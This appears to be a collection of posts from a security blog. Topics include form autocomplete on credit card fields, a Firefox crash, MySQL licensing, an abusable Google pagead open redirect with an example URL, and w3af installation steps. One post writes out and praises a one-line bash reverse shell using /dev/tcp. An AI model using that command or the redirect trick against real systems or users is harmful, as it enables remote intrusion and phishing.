.:Computer Defense:.

One of my favourite things is Autocomplete. I'm sure plenty of security folks are cringing right now, but I enjoy it. It saves me a crapload of data entry every time I want to place an order (Name, Address, Phone number) or post a blog comment (Name, Email, Website)...

Anyways... what really bothers me is web developers that don't know about, or refuse to acknowledge the existence of, autocomplete. Let's compare two online ordering systems that I use frequently.

One contains a check box asking if you'd like it to remember your information (excluding credit card information). The entire order form is set to autocomplete=off and if I check the check box, my info is stored in a cookie with a very long expiry date.

The other doesn't save my info, I have to fill it out every time... This is where autocomplete is nice. Name, Address, Apartment Number, Buzzer Code, City, Postal Code, Phone, Email, etc.... Lots of info to provide but for me it's just first letter + tab. I like this feature... My problem is when I get to credit card information. This website hasn't seen the need to set the credit card related fields to autocomplete=off. Now I know that after I order I have to clear saved form data... this was once an issue though.

I ordered from this company via credit card, but then I moved over to cash orders... months later I happened to order via credit card again... this was when I discovered that the data was autocompleted. I find this very frightening for a number of reasons.

So I want to know... do web developers really have a hard time with autocomplete? I want to point out how important and how vital it is to your online form development. That's all... nothing really here, just a bit of a rant that I wanted to get out. Enjoy.

I don't have much to add, simply details from the original post. Spyware Sucks has a post up documenting some malicious flash that is being served from LiveJournal.com (from one of their banner ads). Just thought I should share to keep people informed.

I've been kinda quiet here the last few days... That being said I've been posting quite a bit on the nCircle VERT blog. I decided that I wouldn't cross post between blogs and I won't post links to CDO on the nCircle blog for no reason,  however I will post links to the nCircle blog on here...

In the past few days I've posted these stories on the nCircle blog... feel free to give them a read:

• Hot off the Press -- PCI 1.1 Requirement 6.6 Finally (and Officially) Clarified!

• Marketing FUD or Useful Comparison? You be the judge.

• Microsoft is OK With You Finding Flaws in their Websites

• Follow-Up: Microsoft Websites Open to Ethical Hackers

I've got a couple interesting blog posts in the works, that will most likely show up here in the near future... but for now there's something to read.

This is really cool... Neohapsis has a great blog post on how a one line bash shell command can create a reverse shell (via Infosec Ramblings).

Think about all those times when you needed a single command line to create a reverse shell... this will do it:

exec /bin/sh 0</dev/tcp/hostname/port 1>&0 2>&0

That's it.. plain and simple and you're done... no need for any outside tools...just the ability to run built in shell commands.

I'm wondering if anyone has been experiencing issues with Firefox 2.0.0.14? I installed it as soon as I noticed it... which I'm guessing was 6-7 hours ago but that may be +/- an hour or two. Since then I've had Firefox crash at least 6 times (never more than two tabs open... usually GMail and Bloglines). It just starts "Not Responding" and won't come back out of it.

System:

Windows XP SP2 fully updated
Core2 Quad Q6600 @ 2.40Ghz
3GB RAM available to the OS (32-bit OS)
Plugins Installed: SQL Inject Me, XSS Me, TamperData, User Agent Switcher, Web Developer, Firebug and Greasemonkey.

A while ago I stopped reading Slashdot because I generally find the information presented to be over-the-top and bordering on "zealot-like"... I suppose "overly dramatic" would work as well. However I was clicking through and ended up on the main page, which lead to reading the following headline: Sun to Begin Close Sourcing MySQL. It lead me to this article and I realized that the Slashdot headline was overzealous and so was Jeremy Cole.

Essentially, MySQL will be releasing some advanced features only to it's enterprise customers. I get this... It makes business sense. The age old adage is, after all, "Why buy the cow, when you can get the milk for free". I kinda feel that the FOSS community sometimes feels a sense of entitlement that they don't deserve. There plenty of FOSS users and supporters, but how many of them actually contribute back to FOSS. They do nothing, until they may lose some "advanced functionality"... then they scream as loud as anyone else.

Numerous people on Jeremy's website commented that MySQL was going to be giving "beta-like" software to their enterprise customers because they didn't have the community to test it. This puts way to much importance on the community. There are plenty of closed-source and paid software companies that ship software directly to enterprise customers without first running it by the FOSS community. This software does just fine.

In the end, this is a bunch of sour grapes over something that really isn't that big of a deal. Use another database or pay for the enterprise software.

SANS ISC is reporting that various sources are saying that we may see XP SP3 before the end of the month. With OEMs and MSDN subcribers seeing the patch on April 21st and an end-user release date of April 28th.

About 15 minutes ago I had connection problems with my Google Apps account. My web-based Google Chat had disappeared, so I closed my browser and reopened it, but it's gone... completely gone... the Chat tab is even gone inside my settings options.

Anybody got any ideas?

The X represents where the Chat Window normally is and the arrow points to where the chat settings would normally be.

Update:

Alex Word just pointed out that this is back up now. Thanks Alex!

This isn't a new topic... McAfee mentioned it a couple of weeks ago, and it appeared in a ha.ckers.org comment almost 2 years ago.

It seems that Google Page Ad (http://www.google.com/pagead) can be abused as a redirect. This redirect won't work blindly, certain variables require certain values. However those variables aren't validated... I can generate a valid redirect, and then substitute in any url I want and it will still work. I've been noticing more and more spam lately making use of this, and it leads me to wonder why Google, with all their power (and I am a huge Google fan), can't get the validation right to ensure that this issue stops.

Here's an example URL... however in this case, I've removed the spammers address and inserted ComputerDefense.org: http://www.google.com/pagead/iclk?sa=l&ai=JqenDy&num=08582&adurl=http://www.computerdefense.org

Update:

In thinking this through more, I thought I should add to it. This redirect requires certain information... without the ai and num fields, the redirect won't work. All Google has to do is tie these fields to a specific URL, they don't even need the redirect URL included anymore... They could validate and redirect based on data they retrieve while validating the request.

This morning I talked about W3AF beta6 being available. Only now did I finally get time to install it... I wanted to test drive the UI, and it ended up being quite the task to get it installed. Part way through I realized that this would be a someone time consuming process and started documenting everything I had to do. I figured that others will most likely want to play with the UI on Windows XP so I'm going to share my documentation:

Installing w3af with UI on Windows XP with Python 2.5

Download pygoogle
Extract pygoogle
From your extracted directory run 'python setup.py install'

Download fpconst
Extract fpconst
From your extracted directory run 'python setup.py install'

Download SOAPpy
Extract SOAPpy
Edit <extractdir>\SOAPpy\Client.py; move the import __futures__ line to Line 1
Edit <extractdir>\SOAPpy\Types.py; move the import __futures__ line to Line 1
Edit <extractdir>\SOAPpy\Server.py; move the import __futures__ line to Line 1
From your extracted directory run 'python setup.py install'

Download gtk+ runtime
File: gtk2-runtime-2.12.1-2007-10-28-ash.exe
Install

Update gtk+ runtime
File: glib-2.16.2.zip
Extract Files
Copy files from \bin over gtk2-runtime install (default: C:\Program Files\GTK2-Runtime\lib)

Install pyGTK files
PyGTK 2.12.1-2
PyGobject 2.14.1-1
PyCairo 1.4.12-2

Download pyOpenSSL
Current Version: 0.7
Install

Download OpenSSL
Current Version: 0.9.8g Light
Install

Download w3af
Extract to directory
Browse to the w3af folder, create a shortcut to file w3af.
Modify shortcut target -- path\to\python25 path\to\w3af -g
Double Click shortcut